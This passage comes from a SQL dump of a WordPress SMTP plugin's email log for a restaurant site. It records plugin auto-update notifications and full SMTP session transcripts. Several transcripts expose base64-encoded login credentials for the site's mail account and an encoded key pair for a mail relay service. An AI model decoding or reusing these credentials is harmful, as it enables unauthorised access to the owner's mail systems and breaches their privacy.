<17a1e5626610cab8ab2ee58341861bb5@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Fri, 20 Nov 2020 12:22:59 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Updr=\r\naftPlus - Backup/Restore version 1.16.36=0A=0A=0AIf you experience any i=\r\nssues or need support, the volunteers in the WordPress.org support forum=\r\ns may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe=\r\n WordPress Team\r\n.\r\n250 OK id=1kg5RL-0005xa-Gi\r\n'),(22636,1243,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22637,1243,'success',''),(22638,1243,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22639,1243,'to_header','webmaster@baldisserri.com'),(22640,1243,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22641,1243,'original_to','webmaster@baldisserri.com'),(22642,1243,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22643,1243,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.6\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22644,1243,'original_headers',''),(22645,1243,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 19:24:04 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22646,1244,'solution','Not found, check status column for more info.'),(22647,1244,'success','1'),(22648,1244,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22649,1244,'to_header','webmaster@baldisserri.com'),(22650,1244,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22651,1244,'original_to','webmaster@baldisserri.com'),(22652,1244,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22653,1244,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.6\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22654,1244,'original_headers',''),(22655,1244,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 19:24:06 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f6cc17bd3c62cf409f1113d69cfbf30a@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Sat, 21 Nov 2020 00:24:06 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Popu=\r\np Builder version 3.69.6=0A=0A=0AIf you experience any issues or need su=\r\npport, the volunteers in the WordPress.org support forums may be able to=\r\n help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kgGhC-0006cU-P4\r\n'),(22656,1245,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22657,1245,'success',''),(22658,1245,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22659,1245,'to_header','webmaster@baldisserri.com'),(22660,1245,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22661,1245,'original_to','webmaster@baldisserri.com'),(22662,1245,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22663,1245,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.37\n- WooCommerce PayPal Checkout Gateway version 2.1.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22664,1245,'original_headers',''),(22665,1245,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 23 Nov 2020 19:22:35 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22666,1246,'solution','Not found, check status column for more info.'),(22667,1246,'success','1'),(22668,1246,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22669,1246,'to_header','webmaster@baldisserri.com'),(22670,1246,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22671,1246,'original_to','webmaster@baldisserri.com'),(22672,1246,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22673,1246,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.37\n- WooCommerce PayPal Checkout Gateway version 2.1.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22674,1246,'original_headers',''),(22675,1246,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 23 Nov 2020 19:22:37 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c8b651a68b1f310e9b0714c6eca56dff@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Tue, 24 Nov 2020 00:22:37 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Updr=\r\naftPlus - Backup/Restore version 1.16.37=0A- WooCommerce PayPal Checkout=\r\n Gateway version 2.1.1=0A=0A=0AIf you experience any issues or need supp=\r\nort, the volunteers in the WordPress.org support forums may be able to h=\r\nelp.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1khM6P-0004aB-FI\r\n'),(22676,1247,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22677,1247,'success',''),(22678,1247,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22679,1247,'to_header','webmaster@baldisserri.com'),(22680,1247,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22681,1247,'original_to','webmaster@baldisserri.com'),(22682,1247,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22683,1247,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22684,1247,'original_headers',''),(22685,1247,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 24 Nov 2020 19:22:32 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22686,1248,'solution','Not found, check status column for more info.'),(22687,1248,'success','1'),(22688,1248,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22689,1248,'to_header','webmaster@baldisserri.com'),(22690,1248,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22691,1248,'original_to','webmaster@baldisserri.com'),(22692,1248,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22693,1248,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22694,1248,'original_headers',''),(22695,1248,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 24 Nov 2020 19:22:34 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <50d7d4bc9a0057d451b30d6ca08cf96d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Wed, 25 Nov 2020 00:22:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL version 4.0.0=0A=0A=0AIf you experience any issues or need=\r\n support, the volunteers in the WordPress.org support forums may be able=\r\n to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Tea=\r\nm\r\n.\r\n250 OK id=1khiZu-00036L-IN\r\n'),(22696,1249,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22697,1249,'success',''),(22698,1249,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22699,1249,'to_header','webmaster@baldisserri.com'),(22700,1249,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22701,1249,'original_to','webmaster@baldisserri.com'),(22702,1249,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22703,1249,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.13\n- WooCommerce version 4.7.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22704,1249,'original_headers',''),(22705,1249,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 25 Nov 2020 07:24:48 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22706,1250,'solution','Not found, check status column for more info.'),(22707,1250,'success','1'),(22708,1250,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22709,1250,'to_header','webmaster@baldisserri.com'),(22710,1250,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22711,1250,'original_to','webmaster@baldisserri.com'),(22712,1250,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22713,1250,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.13\n- WooCommerce version 4.7.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22714,1250,'original_headers',''),(22715,1250,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 25 Nov 2020 07:24:50 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <152068d00e5d8896d0beafe6c2d9dd22@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Wed, 25 Nov 2020 12:24:50 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Cook=\r\nie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.13=0A- W=\r\nooCommerce version 4.7.1=0A=0A=0AIf you experience any issues or need su=\r\npport, the volunteers in the WordPress.org support forums may be able to=\r\n help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1khtqs-0000ko-Oa\r\n'),(22716,1251,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22717,1251,'success',''),(22718,1251,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22719,1251,'to_header','webmaster@baldisserri.com'),(22720,1251,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22721,1251,'original_to','webmaster@baldisserri.com'),(22722,1251,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22723,1251,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.1\n- UpdraftPlus - Backup/Restore version 1.16.40\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22724,1251,'original_headers',''),(22725,1251,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 25 Nov 2020 19:22:35 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22726,1252,'solution','Not found, check status column for more info.'),(22727,1252,'success','1'),(22728,1252,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22729,1252,'to_header','webmaster@baldisserri.com'),(22730,1252,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22731,1252,'original_to','webmaster@baldisserri.com'),(22732,1252,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22733,1252,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.1\n- UpdraftPlus - Backup/Restore version 1.16.40\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22734,1252,'original_headers',''),(22735,1252,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 25 Nov 2020 19:22:37 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <d570988b5dbdf29c04a57a833f91c3c7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Thu, 26 Nov 2020 00:22:37 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL version 4.0.1=0A- UpdraftPlus - Backup/Restore version 1.1=\r\n6.40=0A=0A=0AIf you experience any issues or need support, the volunteer=\r\ns in the WordPress.org support forums may be able to help.=0Ahttps://wor=\r\ndpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1ki53V-0008Fa-Gi\r\n'),(22736,1253,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22737,1253,'success',''),(22738,1253,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22739,1253,'to_header','webmaster@baldisserri.com'),(22740,1253,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22741,1253,'original_to','webmaster@baldisserri.com'),(22742,1253,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22743,1253,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22744,1253,'original_headers',''),(22745,1253,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 26 Nov 2020 07:24:45 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22746,1254,'solution','Not found, check status column for more info.'),(22747,1254,'success','1'),(22748,1254,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22749,1254,'to_header','webmaster@baldisserri.com'),(22750,1254,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22751,1254,'original_to','webmaster@baldisserri.com'),(22752,1254,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22753,1254,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22754,1254,'original_headers',''),(22755,1254,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 26 Nov 2020 07:24:47 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f12887d011d0fb5cdaca41fb5d97ef4a@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Thu, 26 Nov 2020 12:24:47 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: 